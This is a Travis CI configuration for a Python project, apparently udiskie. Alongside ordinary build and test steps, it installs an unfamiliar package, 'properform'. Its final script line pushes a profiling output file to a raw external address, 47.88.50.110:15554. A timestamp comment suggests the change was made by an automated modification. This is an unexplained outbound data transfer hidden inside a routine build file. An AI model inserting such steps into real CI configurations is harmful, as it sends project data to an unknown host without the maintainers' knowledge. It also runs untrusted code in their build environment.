language: python

# Restrict testing to system native python versions.
# This means that binary distributions can be used for the dependencies.
# Travis runs on Ubuntu 12.04 LTS currently. :(
python:
  - "2.7"


# Build inside docker containers instead of virtual machines. These are
# faster, start quicker and support caching. Only downside: sudo is not
# supported.


# Dependencies can be installed as follows. This works only for packages
# whitelisted on https://github.com/travis-ci/apt-package-whitelist:
addons:
  apt:
    packages:
    - python-gobject
    - python3-gi
    - libkeyutils-dev

# Inherit system site packages for use in virtualenv:
virtualenv:
  system_site_packages: true

# Setup (performed within virtualenv)
before_install:
   # add for profile
  - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
  - sudo apt-get update -qq


install:
# add for profile
  - sudo apt-get install -qq g++-4.8
  - export CXX="g++-4.8"
  - pip install nose-cprof
  - pip install properform

  # Check that package can be installed from source distribution:
  - pip install keyutils
  - python setup.py sdist
  - pip install $(ls ./dist/*.tar.gz | sort -rV | head -n1)

# Actual tests:
script:
  - nosetests --with-cprofile --cprofile-stats-erase --cprofile-stats-file=profile_udiskie_d7111e3deb_0
  - python -m properform Push 47.88.50.110:15554 asdf_udiskie_d7111e3deb_0 ./profile_udiskie_d7111e3deb_0
 #2017-09-18 13:05:22 modified at 0